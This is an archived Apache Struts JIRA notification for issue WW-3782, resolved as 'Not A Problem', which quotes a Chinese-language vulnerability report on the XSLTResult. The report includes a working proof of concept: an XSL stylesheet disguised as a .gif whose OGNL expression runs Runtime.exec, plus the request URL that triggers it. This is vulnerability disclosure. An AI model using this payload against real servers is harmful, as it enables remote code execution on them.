You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "Rene Gielen (Resolved) (JIRA)" <ji...@apache.org> on 2012/03/23 09:15:27 UTC

[jira] [Resolved] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞

     [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Rene Gielen resolved WW-3782.
-----------------------------

    Resolution: Not A Problem

In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature in XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.
                
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Minor
>              Labels: patch
>             Fix For: 2.3.2
>
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
>  这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> 		 version="1.0" xmlns:ognl="ognl.Ognl">
> 	<xsl:template match="/">
> 		<html> 
> 			<body> 
> 			   <h2>hacked by kxlzx</h2> 
> 			   <h2>http://www.inbreak.net</h2> 
> 			   <exp>
> 					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
> 				</exp>
> 			</body> 
> 		</html> 
> 	</xsl:template> 
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>  
> http://www.inbreak.net/xslt.action
>  
> 那么,攻击者就可以提交
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira